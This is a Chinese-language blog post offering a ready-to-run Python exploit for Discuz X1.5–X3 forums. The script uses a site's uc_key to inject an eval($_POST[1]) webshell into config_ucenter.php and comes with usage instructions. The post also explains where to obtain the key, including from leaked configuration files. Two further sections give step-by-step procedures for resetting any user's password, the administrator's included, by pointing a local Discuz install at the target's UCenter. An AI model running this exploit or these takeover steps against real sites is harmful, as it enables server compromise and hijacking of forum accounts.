Discuz X1.5 X2.5 X3用uc_key getshell与UC_KEY可重置论坛任意用户的密码总结

基础知识：

Discuiz!和UCenter是相互独立的，UCenter分为Server和Client。Discuiz!是作为UCenter Server的客户端存在的，其中默认集成有UCenter Client，而UCenter Server部分会在你安装Discuiz！时询问是否安装安装还是选择一个已经存在的UCenter Server。

一、Discuz X1.5 X2.5 X3用uc_key来get webshell

uc_key是UC客户端与服务端通信的通信密钥。因此使用uc_key来fetshell只能获取UCenter Client的webshell，即Discuiz！论坛的webshell。如果一个服务器上只有UCenter Server是不能通过uc_key来获取该服务器上的webshell的（不过可以通过uc_key来将服务器上的数据并重置用户口令，后面讲）。

90分享的php版的exp代码，但uc_key和url是嵌入在代码中的，因此导致使用不方便。所以我将代码改成python版的，以后使用就方便了。代码如下：

#! /usr/bin/env python
#coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys

def microtime(get_as_float = False) :
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())

def get_authcode(string, key = ''):
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()

    key_length = len(cryptkey)
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length])
    j=0
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    a=0
    j=0
    for i in range(0,string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')

def get_shell(url,key,host):
    '''
    发送命令获取webshell
    '''
    headers={'Accept-Language':'zh-cn',
    'Content-Type':'application/x-www-form-urlencoded',
    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
    'Referer':url
    }
    tm = time.time()+10*3600
    tm="time=%d&action=updateapps" %tm
    code = urllib.quote(get_authcode(tm,key))
    url=url+"?code="+code
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://xxx\');eval($_POST[1]);//</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data1,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "访问出错"
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://aaa</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data2,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "error"
    return "webshell:"+host+"/config/config_ucenter.php,password:1"

if __name__ == '__main__':
    host=sys.argv[1]
    key=sys.argv[2]
    url=host+"/api/uc.php"
    print get_shell(url,key,host)

使用方法：

即第一个参数是网站的根路径，第二个参数是uc_key。获取的webshell是在/config/config_ucenter.php中的。

ps:代码仓促编写，有什么问题请指出。本来打算通过py2exe来将其生成为exe，担心大家怕有后门不敢用，各位大牛就自己生成一下吧。经过测试在discuiz x2.5 x3 x3.1 下都测试成功。

ps:uc_key可以在discuiz后台中看，或者是通过泄露的配置文件中获取。访问discuiz目录下的admin.php登陆后台，在“站长”—>”UCenter 设置”中来查看uc_key.

参考资料：

1、Discuz X1.5 X2.5 X3 有uc_key getshell

2、DZ论坛系统 UC_KEY拿webshell

二、使用UC_KEY可重置论坛（除uid为1的）任意用户的密码

通过获取到的UC_KEY，即可重置论坛任意用户的密码，并清除安全提问。注意本重置任意用户密码的方法并不适用于uid为1的用户（即管理员），因为上会将本地的管理员用户覆盖，从而登陆不进去本地搭建的dz后台(重置管理员uid为1的方法后面讲)

测试环境：

目标站点：http://192.168.32.101/dz/。管理员jinglingshu，建了两个用户test1和test2。uc_key为B4s07bE2n5nef8e2M2F0a3Y8k7G6IeEb70G2Kf1cD0VfO0b1D8pcu6p773E487D9

目标：重置test1的用户口令。

可以看到test1用户的uid为2，重置密码的过程如下：

1、本地搭建dz。在”站长”—>”UCenter设置”中修改UCenter设置，然后保存。一定要选择接口方式，且 是否允许其他应用的会员在站点激活、是否允许直接激活 两项配置开启

2、点击“工具”–>“更新缓存”来更新缓存。然后，在“用户”–>“添加用户”中添加要重置的用户。

ps:系统提示用户已经存在，是否在本地激活，选择 是

3、查看本地添加的用户信息，并修改密码和清除安全提问。

4、现在test1的用户的密码被修改为123456，并清除了安全提问。使用test1和123456登陆远程站点。

参考：途牛网某服务配置失误 导致论坛敏感文件泄露(致使百万用户信息告急)

三、使用UC_KEY重置uid为1的用户的密码

上面的方法不适用于uid为1的用户，uid为1的用户的密码重置方法如下。

和上面一样，目标站点信息：http://192.168.32.101/dz/。管理员jinglingshu，建了两个用户test1和test2。uc_key为B4s07bE2n5nef8e2M2F0a3Y8k7G6IeEb70G2Kf1cD0VfO0b1D8pcu6p773E487D9。

过程如下：

1、本地搭建dz。注意，安装过程中填写的管理员信息时要填写与目标站点一样的用户名，而不是默认的admin，密码则任意。

2、和上面方法一样修改ucenter设置。在”站长”—>”UCenter设置”中修改UCenter设置，然后保存。一定要选择接口方式，且 是否允许其他应用的会员在站点激活、是否允许直接激活 两项配置开启。点击“工具”–>“更新缓存”来更新缓存

3、修改本地dz管理员密码并清除用户安全提问。

4、上述操作后，目标站点管理员的口令就会被修改，且清除了用户安全提问。现在用此重置后的密码登陆目标站点后台即可。

参考：途牛网某服务配置失误 导致论坛敏感文件泄露(致使百万用户信息告急)

转载请注明：jinglingshu的博客 » Discuz X1.5 X2.5 X3用uc_key getshell与UC_KEY可重置论坛任意用户的密码总结